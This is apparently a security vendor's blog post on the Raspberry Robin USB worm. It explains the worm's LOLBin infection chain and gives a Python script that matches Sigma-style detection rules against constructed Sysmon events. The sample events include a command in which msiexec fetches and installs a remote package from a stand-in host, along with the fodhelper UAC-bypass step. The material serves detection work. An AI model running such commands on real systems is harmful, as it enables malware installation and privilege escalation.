In a private threat intelligence advisory, Microsoft shared that the Raspberry Robin worm has compromised the networks of hundreds of organizations. The worm, which spreads via USB devices, was first discovered by Red Canary in September 2021. It uses compromised QNAP NAS devices as command and control servers to serve malicious payloads and exfiltrate information.
The original report by Red Canary provides a detailed analysis of how Raspberry Robin spreads from USB devices, persists on user systems and hides its activity by abusing legitimate Windows binaries known as LOLBins. We also recently covered one such LOLBin, mavinject.exe.
Raspberry Robin gains initial access to a target via a malicious .lnk file present on a USB device. cmd.exe /R executes the .lnk, which in turn uses msiexec.exe to download a malicious DLL from a remote URL (a compromised QNAP NAS device). The msiexec.exe execution then spawns fodhelper.exe for privilege escalation and UAC bypass, launching an administrative cmd.exe shell. This shell is used to spawn rundll32.exe, which finally executes the malicious DLL via the LOLBin odbcconf.exe. After execution of the DLL, rundll32.exe constantly generates outbound traffic to TOR nodes for command and control.
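The process chain above maps onto four process-creation detections. The following Python is an added illustration for this post, not code from FourCore, Red Canary or the published Sigma rules: it writes each step as a Sigma-style selection (field names follow Sysmon Event ID 1: Image, ParentImage, CommandLine), implements the endswith/contains/all modifiers, and runs the selections over constructed sample events. The paths, process IDs and the URL in the sample events are made up; a real deployment would feed Sysmon or EDR telemetry instead.

```python
"""Sigma-style matching of the Raspberry Robin LOLBin chain against
Sysmon-like process-creation events. Sample events are constructed."""

# Illustrative selections written in the shape of a Sigma "selection" block.
# Modifier syntax: "Field|endswith", "Field|contains", "Field|contains|all".
# These are example rules for this post, not the published Sigma rules.
RULES = [
    {
        "title": "LNK launched via cmd.exe /R",
        "selection": {
            "Image|endswith": r"\cmd.exe",
            "CommandLine|contains|all": ["/r", ".lnk"],  # loose substring match
        },
    },
    {
        "title": "msiexec.exe fetching package from remote URL",
        "selection": {
            "Image|endswith": r"\msiexec.exe",
            "CommandLine|contains": ["http://", "https://"],
        },
    },
    {
        "title": "fodhelper.exe spawning shell (UAC bypass)",
        "selection": {
            "ParentImage|endswith": r"\fodhelper.exe",
            "Image|endswith": [r"\cmd.exe", r"\powershell.exe"],
        },
    },
    {
        "title": "odbcconf.exe launched by rundll32.exe",
        "selection": {
            "ParentImage|endswith": r"\rundll32.exe",
            "Image|endswith": r"\odbcconf.exe",
        },
    },
]


def _field_matches(value: str, modifiers: list[str], patterns) -> bool:
    """Evaluate one field against an event value, case-insensitively.
    Sigma lists are OR by default; the 'all' modifier turns them into AND."""
    if not isinstance(patterns, list):
        patterns = [patterns]
    value = value.lower()
    require_all = "all" in modifiers
    mode = modifiers[0] if modifiers and modifiers[0] != "all" else "equals"

    def one(pattern: str) -> bool:
        pattern = pattern.lower()
        if mode == "endswith":
            return value.endswith(pattern)
        if mode == "contains":
            return pattern in value
        return value == pattern

    results = [one(p) for p in patterns]
    return all(results) if require_all else any(results)


def matches(rule: dict, event: dict[str, str]) -> bool:
    """Every field in a selection must match (AND semantics inside a selection)."""
    for key, patterns in rule["selection"].items():
        field, *modifiers = key.split("|")
        if not _field_matches(event.get(field, ""), modifiers, patterns):
            return False
    return True


def scan(events: list[dict[str, str]]) -> list[tuple[str, str]]:
    """Return (rule title, ProcessId) for every event that fires a rule."""
    return [(rule["title"], ev["ProcessId"])
            for ev in events for rule in RULES if matches(rule, ev)]


# Constructed sample telemetry: four events mirroring the chain in the post,
# followed by two benign events that must not fire.
SAMPLE_EVENTS = [
    {"ProcessId": "1001", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'cmd.exe /R "E:\readme.lnk"'},
    {"ProcessId": "1002", "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "msiexec.exe /q /i http://nas.example.invalid/package"},
    {"ProcessId": "1003", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\fodhelper.exe",
     "CommandLine": "cmd.exe"},
    {"ProcessId": "1004", "Image": r"C:\Windows\System32\odbcconf.exe",
     "ParentImage": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "odbcconf.exe"},  # arguments omitted in this constructed sample
    {"ProcessId": "2001", "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\alice\Downloads\installer.msi"},
    {"ProcessId": "2002", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for title, pid in scan(SAMPLE_EVENTS):
        print(f"[ALERT] {title}: ProcessId={pid}")
```

Each rule fires on exactly one of the first four events and stays silent on the local MSI install and the plain cmd.exe launch; in production you would additionally correlate the four hits by parent/child relationship within a short window, which is what makes the chain distinctive even when individual LOLBin use is common.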
Raspberry Robin campaigns utilize legitimate binaries (LOLBins) for malicious purposes:
fodhelper.exe - UAC bypass and execution.
msiexec.exe - Downloading the malicious DLL.
odbcconf.exe - Launching the malicious DLL.
Florian Roth, the author of Sigma, posted a variety of Sigma rules on Twitter that are useful for detecting the techniques used by the Raspberry Robin worm. You can find these rules here:
You can also read our previous posts on how to utilize Sigma rules and make them work for your use case and security controls.
The Red Canary team has been up to the task and added several simulations to their open-source attack simulation project Atomic Red Team. These simulations cover the malicious usage of LOLBins employed by the Raspberry Robin malware.
At FourCore, we have built various simulations to validate detection rules as well as the behavioural detection capabilities of security controls that should prevent a Raspberry Robin infection. You can find simulations for privilege escalation via fodhelper.exe, simulating network traffic and exfiltration from rundll32.exe, malicious .lnk payloads, and more.
Our own open-source attack simulation harness, firedrill, offers a simulation for privilege escalation and UAC bypass using fodhelper.exe, which would be helpful to validate your detections.